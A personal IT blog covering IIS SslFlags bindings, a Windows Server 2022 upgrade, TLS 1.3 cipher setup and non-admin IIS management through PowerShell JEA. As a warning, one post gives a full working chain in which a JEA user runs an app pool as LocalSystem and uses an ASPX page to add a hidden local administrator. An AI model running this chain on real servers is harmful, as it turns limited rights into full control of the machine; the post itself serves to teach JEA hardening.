There are currently no feeds available for new posts, but then again I don't have that many new posts anyways.

My blog contains only original content created by me. I don't copy other people's stuff; I write about things that I come across in my daily work with IT.

New-WebBinding Problem with SSL Flags

Recently I tried to run the following code in PowerShell:

New-WebBinding -name Hahndorf -Protocol https -HostHeader www.hahndorf.eu -Port 443 -SslFlags 33

but got the following error:

New-WebBinding : Parameter 'SslFlags' value is out of range: 0-3.

In recent years, the IIS team gave us more options for https bindings, but the WebAdministration cmdlets were not updated to reflect this.

What if we need to use a higher SslFlags value than 3?

We just need to set the SslFlags value by hand:

New-WebBinding -name Hahndorf -Protocol https -HostHeader www.hahndorf.eu -Port 443 -SslFlags 1

Set-WebConfigurationProperty -pspath 'MACHINE/WEBROOT/APPHOST' -filter "system.applicationHost/sites/site[@name='Hahndorf']/bindings/binding[@protocol='https' and @bindingInformation='*:443:www.hahndorf.eu']" -name "sslFlags" -value 33

You have to specify the name of the site and the binding you want to update.
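To see which options a value such as 33 switches on, it helps to decode the bit field. The following is a minimal sketch: the enum name IisSslFlags is made up for illustration, and the flag names and values are what I believe the sslFlags attribute uses in the IIS schema on Server 2022, so check them against IIS_schema.xml on your own machine before relying on them.

```powershell
# Hypothetical helper enum (not part of any module). The values are an
# assumption based on the IIS schema; verify them on your own server.
[Flags()] enum IisSslFlags {
    None             = 0
    Sni              = 1
    CentralCertStore = 2
    DisableHTTP2     = 4
    DisableOCSPStp   = 8
    DisableQUIC      = 16
    DisableTLS13     = 32
    DisableLegacyTLS = 64
}

# Decode a numeric sslFlags value into its flag names.
$decoded = [IisSslFlags]33
$decoded.ToString()

# Compose a numeric value from individual flags, ready for Set-WebConfigurationProperty.
$value = [int]([IisSslFlags]::Sni -bor [IisSslFlags]::DisableTLS13)
$value
```

Under these assumptions, 33 is SNI (1) plus the option to disable TLS 1.3 over TCP (32), which is why it falls outside the 0-3 range the cmdlet accepts.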

Windows Server 2022 in-place upgrade issues

I did an in-place upgrade of my Windows Server 2016 to Server 2022. Here are some issues I encountered.

Installation

I had major problems with the services at my data-center, that had nothing to do with Microsoft.

When installing the OS, 1% of progress took about 20min because the ISO was mounted into the VM in a very weird way.

In the end I copied all files from the ISO to a location on the VM and started setup.exe from there.

The whole process took about 50min for me. About 35min for the installation during which all the web sites were still running.

At some point the screen tells you it is about to reboot but doesn't wait for a confirmation.

In my case a ping didn't respond for about 3min, the web sites were down for about 7 minutes, and back up while the installation was still in progress.

Console logon and RDP worked again after about 16min. This all depends on your hardware. This was all on a VM, bare metal would take much longer.

Desktop???

The first thing I noticed after logging on was a desktop with a Microsoft Edge icon on it. Previously I got just a PowerShell window which is enough for me on the server.

Yes, I still did install the Desktop Experience, not server core, but I had changed the shell to be PowerShell.exe rather than Explorer.exe before, so the upgrade removed that setting.

So much for "keeping your settings".

TLS 1.3

Client Certificates

I have a few web sites for which I use client certificates for authentication, none of those worked any more:

Hmmm can't reach this page

The connection was reset.

I am not sure what exactly does not work here, but I solved this by opening IIS Manager and selecting the https Site Bindings dialog.

Here I checked "Disable TLS 1.3 over TCP", and connections with client certificates work again, but of course only over TLS 1.2.

I have to investigate this further.

TLS 1.3 on Windows Server after inplace Upgrade

I upgraded my Windows server from 2016 to 2022. One of the reasons was to get support for TLS 1.3.

After the painless in-place upgrade process I tested my web sites and still didn't get any TLS 1.3 connections even though I knew it was possible and I tested it on a fresh install of Server 2022.

Previously I did some extensive changes to the TLS protocols and ciphers to disable TLS 1.0 and 1.1 among other things.

I used the tool IISCrypt rather than editing the registry directly. But it doesn't support Server 2022 with TLS 1.3 yet.

Most related settings are in the registry at:

HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\

On a fresh server all the sub-keys are empty, meaning some defaults are used. But on mine, I had many ciphers, hashes and protocols disabled.

Also the keys for TLS 1.3 were missing completely, so I added them:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Client]

"DisabledByDefault"=dword:00000000

"Enabled"=dword:ffffffff

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server]

"DisabledByDefault"=dword:00000000

"Enabled"=dword:ffffffff

but I still did not get any 1.3 connections.

Next I removed all the sub-keys and values under SCHANNEL, but that didn't help either.
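Before changing or deleting anything under SCHANNEL, it can help to list what is actually set. This is a read-only sketch; the function name Get-SchannelProtocolState is made up for illustration, and it only looks at the Protocols sub-key, not at ciphers or hashes.

```powershell
# Hypothetical helper: lists the Enabled / DisabledByDefault values for every
# protocol that has a Client or Server sub-key. It changes nothing.
function Get-SchannelProtocolState {
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols'
    Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -in 'Client', 'Server' } |
        ForEach-Object {
            $values = Get-ItemProperty -Path $_.PSPath
            [pscustomobject]@{
                Protocol          = Split-Path -Path $_.PSParentPath -Leaf
                Role              = $_.PSChildName
                Enabled           = $values.Enabled            # empty when the value is not set
                DisabledByDefault = $values.DisabledByDefault  # empty when the value is not set
            }
        }
}

# Usage: Get-SchannelProtocolState | Format-Table
```

An empty result means no protocol overrides exist and the OS defaults apply, which matches what a fresh install looks like.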

I found a key: Functions under

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\SSL\00010002

that lists all available cipher suites, but doesn't seem to reflect the order of them.

It turned out Microsoft only supports two cipher suites with TLS 1.3:

TLS_AES_256_GCM_SHA384

TLS_AES_128_GCM_SHA256

both of which I had disabled for some reason.

To see your cipher suites use:

Get-TlsCipherSuite | ft Name

I enabled them in IISCrypt and moved them to the top and after another reboot I finally had TLS 1.3 connections.

There is also a PowerShell cmdlet Enable-TlsCipherSuite which allows us to enable and sort cipher suites, I will use that next time.
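A rough sketch of how that could look, assuming the two TLS 1.3 suites named above are simply missing from the enabled list. The function names are made up for illustration, the wrapper must run elevated, and it does not try to move suites that are already enabled but sit further down the list.

```powershell
# Hypothetical helper: returns the wanted suites that are not in the enabled list.
function Get-MissingCipherSuite {
    param(
        [string[]]$Enabled,
        [Parameter(Mandatory)][string[]]$Wanted
    )
    $Wanted | Where-Object { $Enabled -notcontains $_ }
}

# Hypothetical wrapper around the TLS module cmdlets; supports -WhatIf.
function Enable-Tls13CipherSuite {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $wanted  = 'TLS_AES_256_GCM_SHA384', 'TLS_AES_128_GCM_SHA256'
    $missing = @(Get-MissingCipherSuite -Enabled (Get-TlsCipherSuite).Name -Wanted $wanted)
    # Insert in reverse order so the first wanted suite ends up at position 0.
    [array]::Reverse($missing)
    foreach ($name in $missing) {
        if ($PSCmdlet.ShouldProcess($name, 'Enable-TlsCipherSuite')) {
            Enable-TlsCipherSuite -Name $name -Position 0
        }
    }
}

# Usage: Enable-Tls13CipherSuite -WhatIf
```

Running it with -WhatIf first shows which suites would be enabled without touching the system. A reboot may still be needed before the change takes effect, as it was with IISCrypt.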

I now get many of the following events (36874) in the System event log:

An TLS 1.2 connection request was received from a remote client application,

but none of the cipher suites supported by the client application are supported by the server.

The TLS connection request has failed.

So some client, most likely a minor search bot, failed to connect. I don't think I can find out which cipher suites it supported.

It may actually be myself using sslyze.exe or ssllabs.com to check my sites; those tools will try all kinds of cipher suites.
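One way to test that theory is to count the events per day and compare the dates with my own scanner runs. This is only a sketch: the function name is made up for illustration, and the event itself does not reveal which cipher suites the client offered.

```powershell
# Hypothetical helper: counts event 36874 in the System log per day.
function Get-SchannelHandshakeFailure {
    param([int]$MaxEvents = 200)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 36874 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Group-Object -Property { $_.TimeCreated.ToString('yyyy-MM-dd') } |
        Sort-Object -Property Name |
        Select-Object -Property Name, Count
}

# Usage: Get-SchannelHandshakeFailure -MaxEvents 500
```

If the spikes line up with the days I ran sslyze or an SSL Labs scan, the events are most likely self-inflicted.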

Too much administration via JEA and IIS

In the original version of my blog post: Manage IIS as a non admin user I suggested:

VisibleCmdlets = 'WebAdministration\*'...this means that we allow the JEA user to use all cmdlets in the WebAdministration PowerShell module, after all we want him/her to administrate the whole of IIS.

But we need to be very careful with being so careless with permissions, consider the following:

After the user (named: joe) connects to the JEA-point like:

Enter-PSSession -ComputerName localhost -Credential (Get-Credential) -ConfigurationName "JeaIISConfigName"

he can execute the following commands:

New-WebAppPool -Name JeaHackPool

New-WebSite -Name JeaHackSite -Port 85 -PhysicalPath "C:\Users\joe\wwwroot" -ApplicationPool JeaHackPool

Set-WebConfigurationProperty -pspath 'MACHINE/WEBROOT/APPHOST' -filter "system.applicationHost/applicationPools/add[@name='JeaHackPool']/processModel" -name "identityType" -value "LocalSystem"

Set-WebConfigurationProperty -pspath 'MACHINE/WEBROOT/APPHOST' -location 'JeaHackSite' -filter "system.webServer/security/authentication/anonymousAuthentication" -name "userName" -value ""

He created a new IIS application-pool and website and made sure the site runs under the local system account.

exit

back in the normal (non-JEA) PowerShell session, he can now:

New-Item -Type Directory -Path "C:\Users\joe\wwwroot"

New-Item -Type File -Path "C:\Users\joe\wwwroot\default.aspx"

and use the following as the content of the home page default.aspx

<%@ Page Language="C#" %>
<script runat="server">
    protected string output = "";

    private void Run(string command)
    {
        var p1 = new System.Diagnostics.Process();
        p1.StartInfo.UseShellExecute = false;
        p1.StartInfo.RedirectStandardOutput = true;
        p1.StartInfo.FileName = "C:\\Windows\\System32\\cmd.exe";
        p1.StartInfo.Arguments = "/c " + command;
        p1.Start();
        output += p1.StandardOutput.ReadToEnd();
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        Run("net user myadmin myPassOrd19 /ADD /EXPIRES:Never");
        Run("net localgroup administrators myadmin /ADD");
        Run("net user myadmin");
    }
</script>
<%= output %>

Now he can open that new aspx page:

(Invoke-WebRequest -Uri "http://localhost:85").Content

the output should be something like this:

The command completed successfully. The command completed successfully. User name myadmin ... Local Group Memberships *Administrators *Users The command completed successfully.

now he can use the new user to start an elevated PowerShell admin session:

Start-Process -FilePath powershell.exe -Verb runas

and of course now he can do anything with your machine.

So the takeaway is: never give any user full access to the WebAdministration module. Be very specific with your JEA capabilities: allow only the tasks that are needed and nothing that could potentially be used to take over your computer.

This is not only true for IIS, but may also apply to other parts of the OS management.



Manage IIS as a non admin user

I always try to do as many things as possible as a normal user, but fully managing IIS was always restricted to administrators. Calling any Web-Administration APIs requires your user to be a member of the administrators group.

One workaround was to change the NTFS permissions on ApplicationHost.config file and edit it directly, but I wouldn't recommend this, especially not on a production server.

If you like to use the IIS GUI management tools, you are still out of luck. But if you are happy to use PowerShell cmdlets to manage IIS, I will describe here how to do that as a non-administrator.

To pull off this trick we are gonna use JEA, or PowerShell Just Enough Administration, you need PowerShell 5.0 or higher which is available for all supported Windows versions (Server 2008 R2 and higher, but also Windows 7+).

If you don't know what JEA is, in a nutshell it uses PowerShell Remoting and a set of rules to allow normal users to perform actions that are normally limited to administrators. In the background, a virtual administrator account is executing those actions, but the rules define very precisely what these actions are.

We are going through all the steps needed to make this work. I assume a single local machine with Windows 10.

For all the setup work here, you need a PowerShell console started as an elevated administrator.

Installing IIS

For our purpose we need a basic IIS install, but we need the PowerShell IIS cmdlets. You can learn more about different ways for installing Windows features on the command line.

Enable-WindowsOptionalFeature -Online -FeatureName "IIS-WebServerRole"

Enable-WindowsOptionalFeature -Online -FeatureName "IIS-ManagementScriptingTools"

Enable Remoting

On server, PowerShell Remoting is usually enabled by default, on a workstation OS run:

Enable-PSRemoting

Creating a Windows group and user

To test our setup, we are creating a new Windows group and a normal user who is a member of this group.

New-LocalGroup -Name "IIS-Webmasters"

$Password = Read-Host -AsSecureString -Prompt "Enter a password for the user"

New-LocalUser "iisManager" -Password $Password -FullName "IIS Manager" -Description "User to manage IIS"

Add-LocalGroupMember -Group "users" -Member "iisManager"

Add-LocalGroupMember -Group "IIS-Webmasters" -Member "iisManager"

Creating a PowerShell Module with rules

This part is the meat of this task. To define rules for JEA, we need to create a PowerShell module.

We create a PowerShell module and related files. The location has to be under a directory listed in $env:PSModulePath and should not be writable by normal users, otherwise they could change the rules.

Run the following commands:

$moduleName = "IISJea"

$groupName = "IIS-Webmasters"

$modulePath = Join-Path -Path $env:ProgramFiles -ChildPath "WindowsPowerShell\Modules\$moduleName"

$manifestFile = Join-Path -Path $modulePath -ChildPath "$moduleName.psd1"

$roleDir = Join-Path -Path $modulePath -ChildPath "RoleCapabilities"

$roleFile = "$roleDir\$($moduleName).psrc"

$SessionFile = Join-Path -Path $modulePath -ChildPath "$moduleName.pssc"

$cmdlets = 'WebAdministration\*','Get-IISSite','Start-IISSite','Stop-IISSite','Get-IISAppPool','Get-ChildItem','Set-Location'

$aliases = "ls","cd"

$providers = 'WebAdministration','Variable'

New-Item -ItemType Directory -Path $modulePath

New-Item -ItemType Directory -Path $roleDir

New-Item -ItemType File -Path (Join-Path $modulePath -ChildPath "$moduleName.psm1")

New-ModuleManifest -Path "$manifestFile" -RootModule "$moduleName.psm1"

New-PSRoleCapabilityFile -VisibleCmdlets $cmdlets -VisibleAliases $aliases -VisibleProviders $providers -Path "$roleFile"

New-PSSessionConfigurationFile -SessionType RestrictedRemoteServer -RunAsVirtualAccount -RoleDefinitions @{"$groupName" = @{ RoleCapabilities ="$moduleName"}} -Path $SessionFile

Register-PSSessionConfiguration -Path $SessionFile -Name $moduleName -Force

We created all required configuration files and registered a JEA endpoint.

Testing

Now we can test our configuration, this should be done from a non-admin PowerShell session:

$cred = Get-Credential -Credential iisManager

Enter-PSSession -ComputerName localhost -Credential $cred -ConfigurationName IISJea

if everything works, a new prompt should appear and we can manage IIS:

[localhost]: PS> Get-ChildItem -Path iis:\sites

[localhost]: PS> Stop-WebSite -Name "Default Web Site"

[localhost]: PS> Add-WebConfigurationProperty -pspath 'MACHINE/WEBROOT/APPHOST/Default Web Site' -filter "system.webServer/defaultDocument/files" -name "." -value @{value='foo.html'}

but we can only manage IIS, nothing else, not even things we could normally do:

[localhost]: PS> cd C:

[localhost]: PS> Get-Process

all fail because the provider or the command is not allowed in this session.

Changing things

When we want to make changes to our configuration, we first need to unregister the JEA endpoint:

Unregister-PSSessionConfiguration IISJea

Now we can edit the configuration files, all related files are in:

C:\Program Files\WindowsPowerShell\Modules\IISJea

Edit IISJea.pssc to change who can use the endpoint, you need to change the RoleDefinitions.

Edit RoleCapabilities\IISJea.psrc to change what the user can do.

For example, what if your user should be able to restart not only application pools but the whole IIS service?

You need to edit the VisibleCmdlets value in IISJea.psrc, at the end of the line add:

, @{Name = "Restart-Service"; Parameters = @{Name="Name"; ValidateSet="WAS"},@{Name="Force"}}

Here we are telling JEA to allow the user to restart a service, but only one, in this case the Windows Process Activation Service, which is part of IIS and the one we want to restart. We also need to allow the -Force parameter, because WAS has dependent services that need to restart as well. No other services can be changed by the user.

When done with editing, we need to register the endpoint again:

Register-PSSessionConfiguration -Name IISJea -Force -Path "$($env:ProgramFiles)\WindowsPowerShell\Modules\IISJea\IISJea.pssc"

For more details check the Microsoft documentation

Removing the whole thing

After the test you should clean up. We unregister the endpoint and delete all files:

Unregister-PSSessionConfiguration -Name IISJea

Get-ChildItem -Path "$($env:ProgramFiles)\WindowsPowerShell\Modules\" -Filter "IISJea" -Recurse | Remove-Item -Force -Recurse

Be very, very careful!

As mentioned in the warning above, using $cmdlets = 'WebAdministration\*' is very dangerous, as it allows an experienced user to completely take over your machine. So never use it.

Instead determine what exactly it is your non-admin user has to do with IIS. Ideally only grant access to Read-only (Get-*) cmdlets.

Set-WebConfigurationProperty is very dangerous because it allows users to change any setting and therefore to use the same hack described in Too much administration via JEA and IIS.

If you really need to allow changes, be very specific about what a user can do, like this:

$cmdlets += @{
    Name = "Set-WebConfigurationProperty"
    # The patterns are anchored with ^ and $ so that only the exact values match,
    # e.g. a site named "MySite2" is not accepted by accident.
    Parameters = @{Name='pspath'; ValidatePattern='^MACHINE\/WEBROOT\/APPHOST\/MySite$'},
                 @{Name='filter'; ValidatePattern='^system\.webServer\/urlCompression$'},
                 @{Name='Name'; ValidatePattern='^doStaticCompression$'},
                 @{Name='Value'; ValidatePattern='^(True|False)$'}
}
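To check how far an endpoint strays from the read-only (Get-*) ideal, you can list what a given user would see and filter out the Get-* commands. This is a small sketch: Get-NonReadOnlyCommand is a made-up helper, and the usage lines assume the IISJea endpoint and the iisManager user from this post and must run in an elevated session.

```powershell
# Hypothetical helper: returns every command name that is not a Get-* command.
function Get-NonReadOnlyCommand {
    param(
        [Parameter(Mandatory)]
        [AllowEmptyCollection()]
        [string[]]$Name
    )
    $Name | Where-Object { $_ -notlike 'Get-*' } | Sort-Object -Unique
}

# Usage (elevated), with Get-PSSessionCapability from PowerShell 5.1:
# $user    = "$env:COMPUTERNAME\iisManager"
# $visible = (Get-PSSessionCapability -ConfigurationName 'IISJea' -Username $user).Name
# Get-NonReadOnlyCommand -Name $visible
```

The result will also contain harmless session plumbing that RestrictedRemoteServer adds on its own, such as Exit-PSSession or Select-Object. Anything else on the list, especially Set-* and New-* cmdlets, deserves a parameter restriction like the one above.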
